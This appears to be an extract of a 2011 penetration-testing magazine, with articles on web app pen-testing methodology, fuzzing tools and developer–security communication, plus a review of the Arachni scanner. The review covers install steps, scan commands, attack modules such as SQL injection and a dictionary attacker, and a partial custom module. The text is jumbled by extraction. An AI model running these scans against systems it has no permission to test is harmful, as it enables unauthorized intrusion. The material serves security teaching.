Technical VulnerabilitiesWhere such vulnerabilities can be examined through the following tests Cross-Site-Scripting Injection Flaws and Buffer Overflow Automated systems and tools which analyze and test the web applications are much better equipped to test for technical vulnerabilities than the manual penetration tests While automated testing and scanning tools may not be able
012011 (1) November
WEB APP SECURITY
Page 14 httppentestmagcom012011 (1) November Page 15 httppentestmagcom012011 (1) November
to address 100 of all the technical vulnerabilities there is no reason to believe that such tools will achieve such goal in the near future Current problems facing the web application tools are the following client-side generated URLs required JavaScript functions application logout transaction-based systems requiring specific user paths automated form submission one time passwords and Infinite web sites with random URL-based session IDs
Logical VulnerabilitiesWhere such vulnerabilities can manipulate the logic of the application to do tasks that were never intended to be done While both an automated scanning tool and skilled penetration tester can navigate through a web application only the latter is able to understand what the logic behind specific workflow or how the application works in general Understanding the logic and the flow of an application allows the manual pen testing to subvert or overthrow the business logic where security vulnerabilities can be exposed For instance an application might direct the user from point A to point B to Point C based on the logic flow implemented within the application where point B represents a security validation check A manual review of the application might show that it is possible for attackers to manipulate the web application to go directly from point A to point C and bypassing the security validation exists at point B
History has proven that software bugs defects and logical flaws are consistently the primary cause of commonly exploited application software vulnerabilities where it can lead to unauthorized access to the systems networks and application information It is also proven that most of the security breaches occur due to vulnerabilities within the web application layer (ie attacks using the HTTPHTTPS protocol) In such attacks traditional security mechanism such as firewalls and IDS provide little or no protection against attacks on the web applications
Security analyses review the critical components of a web-based portal e-commerce application or web services platform Part of the analyses work that can be done is to identify vulnerabilities inherent in the code of the web application itself regardless of the technology implemented back-end database or web server used by the application
Itrsquos imperative to point out that the web application penetration assessments should be designed based upon defined threat-model It should also be based upon the evaluation of the integration between components (eg third party components and in-house built components) and the overall deployment configuration that represents a solid choice for establishing a baseline security assessment Application penetration assessments server as a cost-effective mechanism to identify a set of vulnerabilities in a given application where it exposes the most likely exploit vulnerabilities
Figure 1 The different activities of the Pen Testing processes
WEB APP SECURITY
Page 14 httppentestmagcom012011 (1) November Page 15 httppentestmagcom012011 (1) November
and allow to find similar instances of vulnerabilities throughout the code
How Web Application Pen Testing WorksMost of the web applicationsrsquo penetration testing is carried out from security operations centers where the access to the resources under test will be remotely over the Internet using different penetration technologies At the end of such test the application penetration test provides a comprehensive security assessment for various types of applications (eg commercial enterprise web applications internally developed applications web-based portal and e-commerce application) Figure-1 describes some of the activities that usually happen during the pen testing process Some of the testing processes that are used to achieve the security vulnerabilities assessment such as Application Spidering Authentication Testing Session Management Testing Data Validation Testing Web Service Testing Ajax Testing Business Logic Testing Risk Assessment and Reporting
In conducting the web penetration testing different approaches can be used to achieve the security vulnerabilities assessment some of these approaches are
bull Zero-Knowledge Test (Black Box) ndash In such ap-proach the application security testing team will not have any of inside information about the target
environment and the expected knowledge gain will be based on information that can be found out in the public domain This type of test is designed to provide the most realistic penetration test possible since in many cases attackers start with no real knowledge of the target systems
bull Partial Knowledge Test (Gray Box) ndash In such ap-proach a partial gain of knowledge about the environment under testing will be achieved before conducting the test
bull Source Code Analysis (White Box) ndash In such ap-proach the penetration test team has fill information about the application and its source code In such test the security team will do a code review (line-by-line) in attempt to find any flaws that could allow attackers to take control of the application perform a denial of service attack against it or use such flaws to gain access to the internal network
Itrsquos also important to point out that penetration testing can be achieved through two different types of testing
bull External Penetration Testing bull Internal Penetration Testing
Both types of testing can be conducted with least information (black box) and also can be conducted with limited information (white box)
Figure 2 The different phases of the Pen Testing
WEB APP SECURITY
Page 16 httppentestmagcom012011 (1) November Page 17 httppentestmagcom012011 (1) November
Figure-3 shows different procedures and steps that can be used to conduct the penetration testing The following are the description of these steps
bull Scope and Plan ndash In this step the scope of the penetration testing is identified and the project plan and resources will be defined
bull System Scan and Probe ndash In this step the system scanning under the defined scope of the project will be conducted where the automated scanners will examine the open ports scanning the system to detect vulnerabilities and hostnames and IP addresses previously collected will be used at this stage
bull Creating of Attack Strategies ndash In this step the testers prioritize the systems and the attack methods will be used based on the type of the system and how critical these systems Also in this stage the penetration testing tools will be selected based on the vulnerabilities detected from the previous phase
bull Penetration Testing ndash In this step the exploitation of vulnerabilities using the automated tools will be conducted where the attacking methods designed in the previous phase will be used to conduct the following tests data amp service pilferage test buffer overflow privilege escalation and denial of services (if applicable)
bull Documentation ndash In this step all the vulnerabilities discovered during the test are documented evidence of exploitation and penetration testing findings are also recommended to be presented later within the final report
bull Improvement ndash The final step of the penetration testing is to provide the corrective actions on
closing the discovered vulnerabilities within the systems and the web applications
Web Applications Testing ToolsThrough the Pen testing a specific structure methodology has to be followed where the following steps might be used Enumeration Vulnerabilities Assessment and Exploitation Some of the tools that might be used within these steps are
bull Port Scannersbull Sniffersbull Proxy Serversbull Site Crawlersbull Manual Inspection
The output from the above tools will allow the security team to gather information about the environment such as Open ports Services Versions and Operating Systems The vulnerabilities assessment utilizes the data gathered in the previous step to uncover potential vulnerabilities in the web server(s) application server (s) database server (s) and any intermediary devices such as firewalls and load-balancers Itrsquos also important for the security team not to rely solely on the tools during the assessment phase to discover vulnerabilities manual inspection for items such as HTTP responses hidden fields and HTML page sources should be part of the security assessment as well
Some of the areas that can be covered during the vulnerabilities assessment are the following
bull Input validationbull Access Control
Figure 3 Testing techniques procedures and steps
WEB APP SECURITY
Page 16 httppentestmagcom012011 (1) November Page 17 httppentestmagcom012011 (1) November
bull Authentication and Session Management (Session ID flaws) Vulnerabilities
bull Cross Site Scripting (XSS) Vulnerabilities bull Buffer Overflowsbull Injection Flawsbull Error Handlingbull Insecure Storagebull Denial of Service (if required)bull Configuration Managementbull Business logic flawsbull SQL Injection faultsbull Cookie manipulation and poisingbull Privilege escalationbull Command injectionbull Client side and header manipulation bull Unintended information disclosure
During the assessment testing the above vulnerabilities is performed except those that could cause a Denial of Service conditions and usually discussed beforehand Possible options of Denial of Service testing include testing during a specific time testing a development system or manually verifying the condition that may be responsible for the vulnerability Once the vulnerabilities assessment is complete the final reports recommendations and comments are summarized and better solutions are suggested for the implementation process Once the above assessments are done the penetration test is half-way done and the most important part of the assessment has to be delivered which is the informative report thatrsquos highlights all the risks found during the penetration phase
The following are some of the commonly used tools for traditional penetration testing
Port ScannersSuch tools are used to gather information about which network services are available for connection on each target host The port scanning tools usually examines or questions each of the designated network ports or service on the target system Most of these tools are able to scan both TCP as well as UDP ports Another common feature of port scanners is their ability to examine the operating system type and its version number since protocol such as TCPIP implementation can vary in their specific responses The configuration flexibility in the port scanners serve examining the different port configuration as well as employ the ability to hide from the network intrusion detection mechanisms
Vulnerability ScannersWhile port scanners only produce an inventory of the types of available services the vulnerability scanners
attempt to exercise vulnerabilities on their targeted systems The main goal of the vulnerability scanners is to provide an essential means of meticulously examining each and every available network service on the targeted hosts These scanners work from a database of documented network service security defects and exercising each defect on each available service of the target hosts Most of the commercial and the open source scanners scan the operating system for known weaknesses and un-patched software as well as configuration problems such as user permission management defects or problem with file access controls Despite the fact that both network-based and host-based vulnerability scanners do little to help web application-level penetration test they are fundamental tools for any penetration testing Good examples for such tools are Internet Scanners QualysGuard or Core Impact
Application ScannersMost of the application scanners can observe the functional behaviour of an application and then attempt a sequence of common attacks against the application Popular commercial application scanners include Appscan and WebInspect
Web application Assessment ProxyAssessment proxies work by interposing themselves between the web browsers used by the testers and the target web server where data can be viewed and manipulated Such flexibility adds different tricks to exercise the applicationrsquos weaknesses and its associated components For example the penetration testers can view all cookies hidden HTML fields and other data used by the web application and attempt to manipulate their values to trick the application
The above penetration testing practice called a black box testing Some organizations use hybrid approaches where the traditional penetration testing along with some level of source code analysis of the web application is used Most of the penetration testing tools can perform the penetration testing practices however choosing the right tool for the job is something vital for the success of the penetration process and the accurate results
The following are some of the common features that should be implemented within the penetration testing tools
bull Visibility ndash The tool must provide the required visibility for the testing team that can be used as a feedback and reporting feature of the test results
bull Extensibility ndash The tool can be customized and it must provide scripting language or plug-in
WEB APP SECURITY
Page 18 httppentestmagcom012011 (1) November
capabilities that can be used to construct cust-omized the penetration testing
bull Configurability ndash Having the tool that can be configurable is highly recommended to ensure the flexibility of the implementation process
bull Documentation ndash The tool should provide the right documentation that can provide clear explanation for the probes performed during the penetration testing
bull License Flexibility ndash The tool that has the flexibility of use without specific constraints such as a particular IP range of numbers and license limits is a better tool than others
Security Techniques for Web Apps Some of the security techniques that can be implemented within the web application to eliminate vulnerabilities are
bull Sanitize the data coming from the browser ndash Any data that is sent by the browser can never be trusted (eg submitted form data uploaded files cookies data XML etc) If web developers fail to sanitize the incoming data from unwanted data it might lead to vulnerabilities such as SQL injection cross site scripting and other attacks against the web application
bull Validate data before form submission and manage sessions ndash To avoid Cross Site Request Forgery (CSRF) that can occur when a web application accepts form submission data without verifying if it came from a user web form It is imperative for the web application to verify that the user form is the one that the web application had produced and served
bull Configure the server in the best possible way ndash network administrators have to follow some guidelines for hardening the web servers Some of these guidelines are Maintain and update proper security patches kill all the redundant services and shutdown unnecessary ports confine access rights to folders and files employ SSH (Secure Shell network protocol) rather than using telnet or FTP and install efficient anti-malware software
In addition to the above guidelines it is always important to implement strong passwords for the web applications users and cleaning stored passwords
ConclusionA vulnerability assessment is the process of identifying prioritizing quantifying and ranking the vulnerabilities in a system where such process determines if there is
a weakness or vulnerabilities in the system subjected to the assessment Penetration testing includes all of the process in vulnerabilities assessment plus the exploitation of vulnerabilities found in the discovery phase
Unfortunately an all clear result from a penetration test doesnrsquot mean that an application has no problems Penetration tests can miss weakness such as session forging and brute-forcing detection and as such implementing security throughout an applicationrsquos lifecycle is imperative process for building secure web applications
As automated web application security tools have matured in the recent years and over time automated security assessment will continue to both reduce any uncertainty of determination (ie false positive results) and the potential to miss some issues (ie false negatives results)
Both automated and manual penetration testing can be used to discover critical security vulnerabilities in web applications Currently the automated tools canrsquot be entirely used as a replacement of the manual penetration test However if the automated tools are used correctly organizations can save a lot of money and time in finding broad range of technical security vulnerabilities in web applications The manual penetration testing can be used to augment the results of the logical vulnerabilities found as a result of using the automated testing
Finally it is important to point out that over time the manual testing for technical vulnerabilities will increase from difficult to impossible as web applications size and the scope of such applications and their complexity increase The fact that many enterprise organizations will not be able to dedicate the time money and the effort required to assess the thousands of web applications will increase the chances of using the automated tools rather than using the human factor to manually testing these applications Also relying on human efforts to test for thousands of technical vulnerabilities within these applications is subject to the human errors and simply canrsquot be trusted
BRYAN SOLIMANBryan Soliman is a Senior Solution Designer currently working with Ontario Provincial Government of Canada He has over twenty years of Information Technology experience with Bachelor degree in Engineering bachelor degree in Computer Science and Master degree in Computer Science
WHAT IS A GOOD FUZZING TOOLFuzz testing is the most efficient method for discovering both known and unknown vulnerabilities in software It is based on sending anomalous (invalid or unexpected) data to the test target - the same method that is used by hack-ers and security researchers when they look for weaknesses to exploit There are no false positives if the anomalous data causes abnormal reaction such as a crash in the target software then you have found a critical security flaw
In this article we will highlight the most important requirements in a fuzzing tool and also look at the most common mistakes people make with fuzzing
Documented test cases When a bug is found it needs to be documented for your internal developers or for vulnerability management towards third party developers When there are billions of test cases automated documentation is the only possi-ble solution
Remediation All found issues must be reproduced in order to fix them Network recording (PCAP) and automated reproduction packages help you in delivering the exact test setup to the develop-ers so that they can start developing a fix to the found issues
MOST COMMON MISTAKES IN FUZZINGNot maintaining proprietary test scripts Proprietary tests scripts are not rewritten even though the communication interfaces change or the fuzzing platform becomes outdated and unsupported
Ticking off the fuzzing check-box If the requirement for testers is to do fuzzing they almost always choose the quick and dirty solution This is almost always random fuzzing Test requirements should focus on coverage metrics to ensure that testing aims to find most flaws in software
Using hardware test beds Appliance based fuzzing tools become outdated really fast and the speed requirements for the hardware increases each year Software-based fuzzers are scalable in performance and can easily travel with you where testing is needed and are not locked to a physical test lab
Unprepared for cloud A fixed location for fuzz-testing makes it hard for people to collaborate and scale the tests Be prepared for virtual setups where you can easily copy the setup to your colleagues or upload it to cloud setups
PROPERTIES OF A GOOD FUZZING TOOLThere are abundance of fuzzing tools available How to distin-guish a good fuzzer what are the qualities that a fuzzing tool should have
Model-based test suites Random fuzzing will certainly give you some results but to really target the areas that are most at risk the test cases need to be based on actual protocol models This results in huge improvement in test coverage and reduction in test execu-tion time
Easy to use Most fuzzers are built for security experts but in QA you cannot expect that all testers understand what buffer overflows are Fuzzing tool must come with all the security know-how built-in so that testers only need the domain expertise from the target system to execute tests
Automated Creating fuzz test cases manually is a time-consuming and difficult task A good fuzzer will create test cases automatically Automation is also critical when integrating fuzzing into regression testing and bug reporting frameworks
Test coverage Better test coverage means more discovered vulnerabilities Fuzzer coverage must be measurable in two aspects specification coverage and anomaly coverage
Scalable Time is almost always an issue when it comes to testing User must also have control on the fuzzing parameters such as test coverage In QA you rarely have much time for testing and therefore need to run tests fast Sometimes you can use more time in testing and can select other test completion criteria
WEB APP SECURITY
Page 20 httppentestmagcom012011 (1) November Page 21 httppentestmagcom012011 (1) November
Application Security members are considered like the tax man asking for money Security is sometimes seen as a cost to pay in order to get
an application into Production Actually it is a little of everyones fault Since Security people and Developers usually do not talk the same language it is difficult for the two groups to work together and give each other the necessary attention and feedback that they deserve Letrsquos take a step back for a minute and let me clarify what I mean about language and communication Consider this scenario The Marketing department has asked for a brand new web portal that shows new products from the ACME corporation Marketers usually do not know anything about technology and they just want to hit the market with an aggressive campaign on the new product line Marketers might ask the developers something like Give us the latest Web 20 Social website enabled or something like that to impress the customers Plus they would like it as soon as possible and they provide a deadline that the developers must keep The developers brainstorm the idea write out some specifications and requirements start prototyping their ideas and eventually begin coding They are under pressure to meet the deadline and management usually presses even more to meet the proposed deadline Security slowly is pushed aside so that the coding and production can meet the deadline Most software architecture is not designed with security in mind and in project Gantt Charts there usually
are no security checkpoints included for code testing or allow time for security fixes or remediation
Developers are pushed to code the application so that they can meet the deadline Acceptance tests and functionality tests are passed and the application is almost ready for deployment when someone recalls something about security Hey we need to get this on-line So we need to open up firewall to allow access to it
The Security Application group asks for additional information about the application and request docu-mentation of how the application was built They do not see it from the developersrsquo point of view of meeting the deadline that Management has imposed on them
On the other side developers do not see the problem from a security perspective What risks to IT infrastructure will potentially be exposed if someone breaks into the new application
One solution to the problem is to execute a penetration tests on the application and look at the results Then security is happy since they can test the application and developers are happy once the penetration test report is complete Many times a Penetration Test report contains recommended mitigation steps that impose additional time restraints on the application delivery Reports usually contain just the symptom For example the report might have statements like a SQL injection is possible not the real root cause a parameter taken from a config file is not sanitized before utilization The report does not contain all
Developers are from Venus Application Security guys from
Mars
We know that Application Security people talk a different language than developers do whenever we publish a report make an assessment or when we review a software architecture from a security point of view There is a gap between developers and the Application Security group The two teams must interact with each other to reach the same goal of building secure code
WEB APP SECURITY
Page 20 httppentestmagcom012011 (1) November Page 21 httppentestmagcom012011 (1) November
but which is the right one to use to insure secure code development
NET has one single monolithic framework and Microsoft has invested money in security and it seems they did it the right way but it is not Open Source so professionals cannot contribute A generic framework based solution is not feasible What about APIrsquos Developers do know how to use APIrsquos and having security controls embedded into a single library can save the day when writing source code That is why OWASP introduced ESAPI project to provide a set of APIrsquos that developers can use to embed security controls into their code
The requested effort is minimal if compared to translate implement a filter policy into running code and you (as a security professional) now speak the same language as the developer This is a win-win approach The security team and the application developers are now on the same page and everyone is happy There is a third approach I will cover in a follow-up article It is the BDD approach BDD is the acronym for Behavior Driven Development which means that you start writing test cases (taking examples from the Ruby on Rails world you write most of time test beds using rspec and cucumber) modeling how the source code has to behave accordingly to the documentation or requirements specification Initially when you execute the test cases against your application there will probably be failures that need to be corrected The idea is straightforward Using the WAPT activity instead of a implement a filtering policy statement you will produce a set of rspeccucumber scenarios modeling how the source code can deal with malformed input Then the development team starts correcting the code until it passes all of the test cases and when testing is complete and all tests pass it will mean your source code has implemented a filtering policy How has development changed A new approach has been created to insure that the developers implement your remediation statement Now the developers understand how to handle malformed entry statements and why they are so important to the Application Security group
The next article we will see how to write some security tests using the BDD approach in order to help a generic Lava developer to deal with cross-site scripting vulnerabilities
of the information necessary to solve the problems at first glance The developers cannot mitigate all of the issues in time to meet the deadline so many times bug fixes are prolonged or pushed into the next revision of the software and in some cases they are never fixed Another problem is when the two groups talk to each other at the end of the whole process and they use a non-common-ground language that further confuses or annoys everyone and further pushes the groups further apart
Communications Breakdown You Give Me The ReportPenetration test reports are most of the times useless from the developers point of view because they do not give specific information where they can pinpoint where the problem is This is very ironic because the developers need to take full advantage of the security report since most of remediation is source code fixes
Security issues found in Penetration testing is not for the faint of heart There can be a lot of high-level security issues grouped by OWASP Top 10 (most of time) with some generic remediation steps such as implement an input filtering policy This information may not mean anything to a source code developer They want to know what module class or line where the problem exists so that they can fix it If provided enough time developers can eventually determine where the problem exists but usually they do not have the time to look through all of the code to find every testing error and still have time to get the application into production
Letrsquos Close the GapWhat we need to do is define a common ground where security can be integrated into source code somewhat painlessly Security should be transparent from the deve-lopment teamrsquos point of view This can be achieved by
bull Create a development framework that has security built into it
bull Design an API to be used by the application
Putting security into the framework is the Rails approach Railsrsquo developers added a security facility inside the frameworkrsquos helpers so developers inherit the secure input filtering SQL injection protection and CSRF protection token This is a huge step forward to assist developers with this problem This methodology works with a programming language that contains a secure framework for developing web application This is true for the Ruby community (other frameworks like Sinatra do have some security facilities as well) With the Java programming language community there are a lot of non-standardized frameworks available for Java developers
PAOLO PEREGOPaolo Perego is an application security specialist interested in xing the code he just broke with a web application penetration test Hersquos interested in code review and hersquos working on his own hybrid analysis tool called aurora He loves Ruby on Rails kernel hacking playing guitar and playing Tae kwon-do ITF martial art Hersquos an husband and a daddy and a startup wannabe You may want to check out Paolorsquos blog or looking at his about me page
WEB APP VULNERABILITIES
Page 22 httppentestmagcom012011 (1) November Page 23 httppentestmagcom012011 (1) November
Arachni is not a so-called inspection proxy such as the popular commercial but low-cost Burp Suite or the freeware Zed Attack Proxy of the Open
Web Application Security project (OWASP) These tools are really meant to be used by a skilled consultant doing manual investigations of the application
Arachni can be better compared with commercial online scanners which will be directed to the application and produce a report with no further interaction by the user
Every security consultant or hacker must understand the strengths and weaknesses of his or her toolset and to must choose the best combination of tools possible for the job at hand Is Arachni worthwhile
Time for an in-depth review
Under the HoodAccording to the documentation Arachni offers the following
bull Simplicity everything is simple and straight-forward from a userrsquos or component developerrsquos point of view
bull A stable efficient and high-performance framework Arachni allows custom modules reports and plug-ins Developers can easily use the advanced framework features without knowing the nitty gritty details
Pulling the Legs of ArachniArachni is a fire-and-forget or point-and-shoot web application vulnerability scanner developed in Ruby by Tasos ldquoZapotekrdquo Laskos It got quite a good score for the detection of Cross-Site-Scripting and SQL Injection issues on the recently publicised vulnerability scanner benchmark by Shay-Chen
Table 1 Overview of Audit and Reconnaissance modules included with Arachni
Audit Modules Recon ModulesSQL injectionBlind SQL injection using rDiff analysisBlind SQL injection using timing attacksCSRF detectionCode injection (PHP Ruby Python JSP ASPNET)Blind code injection using timing attacks (PHP Ruby Python JSP ASPNET)LDAP injectionPath traversalResponse splittingOS command injection (nix Windows)Blind OS command injection using timing attacks (nix Windows)Remote le inclusionUnvalidated redirectsXPath injectionPath XSSURI XSSXSSXSS in event attributes of HTML elementsXSS in HTML tagsXSS in HTML script tags
Allowed HTTP methodsBack-up lesCommon directoriesCommon lesHTTP PUTInsufficient Transport Layer Protection for password formsWebDAV detectionHTTP TRACE detectionCredit Card number disclosureCVSSVN user disclosurePrivate IP address disclosureCommon backdoorshtaccess LIMIT miscongurationInteresting responsesHTML object grepperE-mail address disclosureUS Social Security Number disclosureForceful directory listing
WEB APP VULNERABILITIES
Page 22 httppentestmagcom012011 (1) November Page 23 httppentestmagcom012011 (1) November
talks to one or more dispatchers that will perform the scanning job New in the latest experimental branch is that dispatchers can communicate with each other and share the load (the Grid)
This is great if you want to speed up the scan or if you want to execute some crazy things like running
We can vouch that both simplicity and performance goals have been attained by Arachni Since the framework is still under heavy development stability is sometimes lacking but at no time this interfered with our vulnerability assessments
Arachni is highly modular both from an architecture point of view as a source code point of view The Arachni client (web or command-line) connects to one or more dispatchers that will execute the scan The connection to these dispatchers can be secured by SSL encryption and cert based authentication One dispatcher can handle multiple clients Multiple dispatchers can share a load and communicate with each other to optimise and speed-up the scanning process
The asynchronous scanning engine supports both HTTP and HTTPS and has pauseresume functionality Arachni supports upstream proxies (for SOCKS4 SOCKS4A SOCKS5 HTTP11 and HTTP10) as well as proxy authentication
The scanner can authenticate versus the web application using form-based authentication HTTP Basic and Digest Authentication and NTLM
At the start of every scan a crawler will try to detect all pages In version 03 this was optional but since version 04 the crawler will always be run at the start of the scan This crawler has filters for redundant pages based on regular expressions and counters and can include or exclude URLs based on regular expressions Optionally the crawler can also follow subdomains There is also an adjustable link count and redirect limit
The HTML parser can extract forms links cookies and headers It can graciously handle badly written HTML due to a combination of regular expression analysis and the Nokogiri HTML parser
Arachni offers a very simple and easy to use module API enabling a developer to access helper audit methods and writing custom modules in a matter of minutes Arachni already includes a large number of modules audit modules and reconnaissance (recon) modules Table 1 provides an overview
Arachni offers report management The following reports can be created standard output HTML XML TXT YAML serialization and the Metareport providing Metasploit integration for automated and assisted exploitation
Arachni has many build-in plug-ins that have direct access to the framework instance Plug-ins can be used to add any functionality to Arachni Table 2 provides an overview of currently available plug-ins
InstallationArachni consists of client-side (web or shell) and server-side functionality (the dispatchers) A client
Table 2 Included Arachni plug-ins Plug-ins have direct access to the framework instance and can be used to add any functionality to Arachni
Plug-insPassive Proxy Analyses requests and responses
between the web application and the browser assisting in AJAX audits logging-in andor restricting the scope of the audit
Form based AutoLogin Performs an automated login
Dictionary attacker Performs dictionary attacks against HTTP Authentication and Forms based authentication
Proler Performs taint analysis with benign inputs and response time analysis
Cookie collector Keeps track of cookies while establishing a timeline of the changes
Healthmap Generates a sitemap showing the health (vulnerability present or not) of each crawledaudited URL
Content-types Logs content-types of server responses aiding in the identication of interesting (possibly leaked) les
WAF (Web Application Firewall) Detector
Establishes a baseline of normal behaviour and uses rDiff analysis to determine if malicious inputs cause any behavioural changes
Metamodules Loads and runs high-level meta-analysis modules premidpost-scanAutoThrottle Dynamically adjusts HTTP throughput during the scan for maximum bandwidth utilizationTimeoutNotice Provides a notice for issues uncovered by timing attacks when the affected audited pages returned unusually high response times to begin with It also points out the danger of DOS (Denail-of-Service) attacks against pages that perform heavy-duty processingUniformity Reports inputs that are uniformly vulnerable across a number of pages hinting to the lack of a central point of input sanitization
WEB APP VULNERABILITIES
Page 24 httppentestmagcom012011 (1) November Page 25 httppentestmagcom012011 (1) November
your dispatchers in multiple geographic zones thanks to Amazon Elastic Compute Cloud (EC2) or similar cloud providers
Letrsquos get our hands dirty and start with the experimental branch (currently at version 04) so we can work with the latest and greatest functionality Another benefit is that this experimental version can work under Windows
Installation under Linux is quick and easy but a Windows set-up requires the installation of Cygwin first Cygwin is a collection of tools that provide a Linux-like environment on Windows as well as providing a large part of Linux APIs Another possibility is to run it natively in Windows using MinGW (Minimalistic GNU for Windows) but at this moment there are too many problems involved with that
LinuxInstallation under Linux is quite straightforward Open your favourite shell and execute the following commands Listing 1
This will install all source directories in your home directory Change all the cd commands if you want the sources somewhere else In case you need an update to the latest versions just cd into the three directories above and perform
$ git pull
$ rake install
Now you can hack the source code locally and play around with Arachni If you encounter a Typhoeus related error while running Arachni issue
$ gem clean
WindowsArachni comes with decent documentation but I had a chuckle when I read the installation instructions for Windows Windows users should run Arachni in Cygwin I knew that this was not going to be a smooth ride Since v03 some changes have been made to the experimental version to make it easier so here we go
Please note that these installation instructions start with the installation of Cygwin and all required dependencies
Install or upgrade Cygwin by running setupexe Apart from the standard packages include the following
bull Database libsqlite3-devel libsql3_0bull Devel doxygen libffi4 gcc4 gcc4-core gcc4-g++
git libxml2 libxml2-devel make openssl-develbull Editors nanobull Libs libxslt libxslt-devel libopenssl098 tcltk
libxml2 libmpfr4bull Net libcurl-devel libcurl4
Listing 1 Installation for Linux
$ sudo apt-get install libxml2-dev libxslt1-dev
libcurl4-openssl-dev libsqlite3-
dev
$ cd
$ git clone gitgithubcomeventmachine
eventmachinegit
$ cd eventmachine
$ gem build eventmachinegemspec
$ gem install eventmachine-100beta4gem
$ cd
$ git clone gitgithubcomArachniarachni-rpcgit
$ cd arachni-rpc
$ $ gem build arachni-rpcgemspec
$ gem install arachni-rpc-01gem
$ cd
$ git clone gitgithubcomZapotekarachnigit
$ cd arachni
$ git checkout experimental
$ rake install
Listing 2 Installation for Windows
$ cd
$ git clone gitgithubcomeventmachine
eventmachinegit
$ cd eventmachine
$ gem build eventmachinegemspec
$ gem install eventmachine-100beta4gem
$ cd
$ git clone gitgithubcomArachniarachni-rpcgit
$ cd arachni-rpc
$ gem build arachni-rpcgemspec
$ gem install arachni-rpc-01gem
$ cd
$ git clone gitgithubcomZapotekarachnigit
$ cd arachni
$ git checkout experimental
$ rake install
WEB APP VULNERABILITIES
Page 24 httppentestmagcom012011 (1) November Page 25 httppentestmagcom012011 (1) November
Accept the installation of packages that are required to satisfy dependencies Note that some of your other tools might not work with these libraries or upgrades In any case an upgrade of Cygwin usually results in recompiling any tools that you compiled earlier
Some additional libraries are needed for the compilation of Ruby in the next step and must be compiled by hand First we need to install libffi Execute the following commands in your Cygwin shell
$ cd
$ git clone httpgithubcomatgreenlibffigit
$ cd libffi
$ configure
$ make
$ make install-libLTLIBRARIES
Next is libyaml Download the latest stable version of libyaml (currently 014) from http httppyyamlorgwikiLibYAML and move it to your Cygwin home folder (probably Ccygwinhomeyour _ windows _ id) Execute the following
$ cd
$ tar xvf yaml-014targz
$ cd yaml-014
$ configure
$ make
$ make install
Now we need to compile and install Ruby Download the latest stable release of Ruby (currently ruby-192-p290targz) from http httpwwwrubyorg and move it to your Cygwin home folder Execute the following commands in the Cygwin shell
$ cd
$ tar xvf ruby-192-p290targz
$ cd ruby-192-p290
$ configure
$ make
$ make install
From your Cygwin shell update and install some necessary modules
$ gem update ndashsystem
$ gem install rake-compiler
$ cd
$ git clone httpgithubcomdjberg96sys-proctablegit
$ cd sys-proctable
$ gem build sys-proctablegemspec
$ gem install sys-proctable-091-x86-cygwingem
Finally we can install Arachni (and the source) by executing the following commands in the Cygwin shell (note these are the same commands as with the Linux installation) Listing 2
In case of weird error-messages (especially on Vista systems) regarding fork during compilation execute the following in your Cygwin shell
$ find usrlocal -iname lsquosorsquo gt tmplocalsolst
Quit all Cygwin shells Use Windows to browse to Ccygwinbin Right click ashexe and choose run as administrator Enter in ash
$ binrebaseall
$ binrebaseall -T tmplocalsolst
Exit ash
Light my FireHow to fire up Arachni depends on whether you want to use it with the new (since version 03) web GUI or simply run everything through the command-line interface Note that the current web GUI does not support all functionality that is available from the command-line
The GUI can be started by executing the following commands
$ arachni_rpcd amp
$ arachni_web
After that browse to httplocalhost4567 and admire the new GUI You will need to attach the GUI to one or more dispatchers The dispatcher(s) will run the actual scan
Figure 1 Edit Dispatchers
WEB APP VULNERABILITIES
Page 26 httppentestmagcom012011 (1) November Page 27 httppentestmagcom012011 (1) November
If you want to use the command-line interface just execute
$ arachni --help
A quick overview of the other screens (Figure 1)
bull Start a Scan start a scan by entering the URL and pressing Launch scan After a scan is launched the screen gives an overview of what issues are detected and how far the process is
bull Modules enable or disable the more than 40 audit (active) and recon (passive) modules that scan for vulnerabilities such as Cross-Site-Scripting (XSS) SQL Injection (SQLi) Cross-Site-Request Forgery (CSRF) or detect hidden features or simply make lists of interesting items such as email addresses
bull Plugins plug-ins help to automate tasks Plug-ins are more powerful than modules and enable to script login sequences detect Web Application Firewalls (WAF) perform dictionary attacks hellip
bull Settings the settings screens allows to add cookies and headers limit the scan to certain directories hellip
bull Reports gives access to the scan reports Arachni creates reports in its own internal format and exports them to HTML XML or text
bull Add-ons three add-ons are installedbull Auto-deploy converts any SSH enabled Linux
box in an Arachni dispatcherbull Tutorial serves as an examplebull Scheduler schedules and run scan jobs at a
specific timebull Log overview of actions taken by the GUI
Your First ScanWe will use both the command-line and the GUI First the command-line start a scan with all modules active This is extremely easy
$ arachni httpwwwexamplecom --report =afroutfile=
wwwexamplecomafr
Afterwards the HTML report can be created by executing the following
$ arachni --repload=wwwexamplecomafr --report=html
outfile=wwwexamplecomhtml
Thatrsquos it Enabling or disabling modules is of course possible Execute the following command for more information about the possibilities of the command-line interface
$ arachni --help
Usually it is not necessary to include all recon modules Some modules will create a lot of requests making detection of your activities easier (if that is a problem with your assignment) and taking a lot more time to finish List all modules with the following command
$ arachni --lsmod
Enabling or disabling modules is easy use the --mods switch followed by a regular expression to include modules or exclude modules by prefixing the regular expression with a dash Example
$ arachni --mods= -xss_ httpwwwexamplecom
The above will load all modules except the module related with Cross-Site-Scripting (XSS)
Using the GUI makes this process even easier Open the GUI by browsing to httplocalhost4567 and accept the default dispatcher
Next steps are to verify the settings in the Settings Modules and Plugins screens Once you are satisfied proceed to the Start a Scan screen
If you want to run a scan against some test applications visit my blog for the list of deliberately vulnerable applications Most of these applications can be installed locally or can be attacked online (please read all related faqs and permissions before scanning a site In most jurisdictions this is illegal unless permission is explicitly granted by the owner)
After the scan just go the Reports screen and download the report in the format you wantFigure 2 Start a scan screen
WEB APP VULNERABILITIES
Page 26 httppentestmagcom012011 (1) November Page 27 httppentestmagcom012011 (1) November
Listing 3 Create your own module
=begin
Arachni
Copyright (c) 2010-2011 Tasos Zapotek Laskos
tasoslaskosgmailcom
This is free software you can copy and distribute
and modify
this program under the term of the GPL v20 License
(See LICENSE file for details)
=end
module Arachni
module Modules
Looks for common files on the server based on
wordlists generated from open
source repositories
More information about the SVNDigger wordlists
httpwwwmavitunasecuritycomblogsvn-digger-
better-lists-for-forced-browsing
The SVNDigger word lists were released under the GPL
v30 License
author Herman Stevens
see httpcwemitreorgdatadefinitions538html
class SvnDiggerDirs lt ArachniModuleBase
def initialize( page )
super( page )
end
def prepare
to keep track of the requests and not repeat them
__audited ||= Setnew
__directories ||=[]
return if __directoriesempty
read_file( all-dirstxt )
|file|
__directories ltlt file unless fileinclude( )
end
def run( )
